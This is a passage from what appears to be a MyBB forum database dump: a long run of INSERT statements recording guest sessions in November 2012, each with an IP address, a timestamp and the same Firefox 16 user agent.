'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3c019bf60c820caf988c4599f357e993', '0', '94.176.252.107', '1352772551', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9781e45ecc6da09d262556114c2214b5', '0', '197.128.245.170', '1352772552', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a83b5af6c8fded0f4a50883f011fe2c', '0', '146.37.52.138', '1352772553', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1a2850f5854f8bae575c684269c272f', '0', '155.210.5.13', '1352772554', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a5fbb9eaeeb584fd4a9dbe1068f449a2', '0', '167.225.37.235', '1352772555', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8803ec67e148ce62a10843c4824e9800', '0', '25.91.224.237', '1352772555', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d82bd5fd331a4ee216e15859cdcb6d4b', '0', '238.43.69.31', '1352772556', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4b3feab10456cdedd8b7b2bd0e787013', '0', '172.228.193.85', '1352772557', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fe49001f81b9a1684ed147d49ad5021b', '0', '132.39.145.69', '1352772558', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('236d091e948ae5c5f560164fff744445', '0', '232.245.53.142', '1352772558', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0c7c6f5dd7c1fc024a897f4bab4ad9e5', '0', '69.38.252.251', '1352772559', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b7d37d41cc1ab8da6c35a0b43a7edd4d', '0', '96.248.174.123', '1352772560', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b6acba815ad6fac54a02511c5cbbd2e1', '0', '3.208.79.118', '1352772561', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('75cfdd3d55fa8d68367232a212cf8b80', '0', '101.9.98.219', '1352772562', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb0c4a4cdd939061be9fbe85f1fa52f6', '0', '73.153.4.31', '1352772562', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc31ab08a038a1815ab8ea6bc1e07d4f', '0', '64.162.141.156', '1352772563', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d755edcf8d9b350ed74903310490ff53', '0', '165.240.22.18', '1352772563', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd9da5b5602df9c27478d4fb352d3e3c', '0', '36.5.219.163', '1352772563', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ae658260bbad746832b839863f0809d', '0', '164.2.166.212', '1352772564', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3f5ef797652ce20b3b091f27e45e2d08', '0', '236.23.105.87', '1352772565', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a42f5db3bb7912cc2b6ffe18e839b9d', '0', '209.158.37.237', '1352772566', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2311ed5b6b32069ee8de10bee533d41c', '0', '220.88.33.169', '1352772567', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1d3bd780b2ef0cd870f1ce49ff3f0c2f', '0', '154.52.204.65', '1352772568', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('85a27d2f4cc3bace2ba231e699ac0cb1', '0', '229.238.77.78', '1352772568', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ce6a3a6cad1ae54e1095db8e9b4a381', '0', '121.28.74.213', '1352772569', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4f06fb7749834ef70700bf1837aa743f', '0', '221.201.159.61', '1352772570', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('50863eb9fbb1915d6586dac843c3f84b', '0', '25.172.238.135', '1352772571', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('35afba6037c5a1a14a943c7d55cf7bd7', '0', '37.138.205.165', '1352772571', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('53437b50f15ceed35d6bc434d7df36e4', '0', '143.235.178.184', '1352772572', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('809e3b12c38a75f8ed3cbb0f450feb9a', '0', '161.193.238.206', '1352772573', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e0a398a305b292cc8a14fc3e7afe0dfe', '0', '103.21.221.39', '1352772574', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb3b4b326a0568444508e1d7d1a71ab1', '0', '173.165.131.237', '1352772575', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c3a46f8724205ff863e57d7ffbebc423', '0', '17.48.107.185', '1352772576', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f98dfcdbe58add1ef7411d8fc5fc8f7', '0', '118.169.180.16', '1352772576', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef27c87b29614e3f2ef70af006975095', '0', '59.179.237.191', '1352772577', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dbec99d35e0a3bcae81e45091bb506b7', '0', '184.122.64.193', '1352772578', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80d6a81fd6d64e877a285359b5cfd4eb', '0', '96.163.15.114', '1352772579', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d3402643b3e3710c3e723604ddd08bcd', '0', '111.117.112.154', '1352772579', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2a13f1fab0bb9a96f7ce39eaa958d3fb', '0', '15.115.112.249', '1352772580', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('735b030be1520da800d6201fd04476f5', '0', '169.11.45.101', '1352772581', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1c592c8e98a3fe6b48c332e31e9e51de', '0', '116.209.138.9', '1352772582', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('63973d8e6a82cf3eb81978b039e71d86', '0', '125.6.220.11', '1352772583', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a5b352b7645ce2915a6c3e47234e7c7', '0', '32.69.230.201', '1352772583', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4cf8b564c1e3fbff6c5db02520092af3', '0', '219.75.29.93', '1352772584', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('67eb15da1c9a4a87feef96675ad48bdb', '0', '53.95.39.48', '1352772585', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79b09a4524d17d2880a738ba8dd7c6b4', '0', '14.77.5.86', '1352772586', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6e6bc94fdba2f2bd6815085d8204835c', '0', '140.216.220.170', '1352772586', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c06ae0f0a6cb7af46e8def1ad9d3a22', '0', '239.215.231.219', '1352772587', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('484c99ca7a405506017b8d5ff4fb0648', '0', '208.210.233.64', '1352772588', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fa279d5ede7e6fd32b65ea86b404cb2d', '0', '251.71.238.67', '1352772589', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5100c85120ee15add1d504b43b51b68f', '0', '1.127.184.97', '1352772590', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d69a665bfa792fb529104f5c569a267d', '0', '60.182.230.131', '1352772591', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fd3a60d13243bd7f2e99ab67a6067ff7', '0', '162.162.12.133', '1352772592', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1e3fc9929f8a0fe2e70e8f4a936a1bbb', '0', '160.241.65.1', '1352772593', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a6c20b9f8cf8cd7bf85f0df9bad1a87', '0', '236.129.201.166', '1352772594', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9ec352c39caa28a304dfb397ef766a31', '0', '199.200.95.180', '1352772594', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc3764634f10372864013c03f873651c', '0', '85.8.46.28', '1352772595', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('37b563b53653247e4225134b8dede462', '0', '159.156.211.196', '1352772596', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9f645453fdf4db9a2ba0462e938ae8aa', '0', '206.156.46.178', '1352772597', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6ba0fd3e66766e60646ab34549d55770', '0', '123.19.113.246', '1352772598', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('825a58d500f6e6ae8eb329e7bfe9a456', '0', '18.68.84.167', '1352772598', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9cc9dd53b2285dd5fff34d5e1cd3c713', '0', '254.243.240.5', '1352772601', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ebf0447780cb0342cf1db74ec22b1775', '0', '66.112.82.81', '1352772601', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ccfcc891a67d3d3bbbe4a0037d0d7b10', '0', '66.254.51.56', '1352772602', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('31cd5422607b4fbeccfe26f9a017ebae', '0', '210.232.125.26', '1352772602', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14e7f1caf4bcb0094e3a8bddd57f1b6a', '0', '1.200.253.88', '1352772603', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b13cca22a95f56c36d399a777ba1dfd0', '0', '163.21.170.223', '1352772603', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f643a8b98868b63509db282b4733ce7c', '0', '17.152.208.115', '1352772604', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2f8a51f38204a8a39956c29416da6590', '0', '29.67.177.118', '1352772604', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef4c98293ee9c2121101985869303a25', '0', '183.199.213.53', '1352772605', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('11ae10c955828834cd12edd96948dfe6', '0', '3.104.236.136', '1352772606', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bb9a3c62a58183c52486827d5f97b93e', '0', '218.100.181.226', '1352772607', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b245fe420961b55ac5be084bdbbae03a', '0', '90.36.161.219', '1352772608', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13a364f1bb1604ed2d1de062fff454bc', '0', '168.206.145.154', '1352772609', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('062dd82bcb83c18b981f0b5b7ecad982', '0', '182.175.83.205', '1352772609', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('268fbdbed4a8424b8f34455732a12969', '0', '166.32.49.214', '1352772610', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b2c2dbe00c3ec9211c99a8f04b9142c6', '0', '13.134.94.52', '1352772611', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('17a450003cd0b3de122bbce5f79450c4', '0', '232.157.41.255', '1352772611', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f032b0fd75de35af54df70e5847ca0a0', '0', '71.162.159.248', 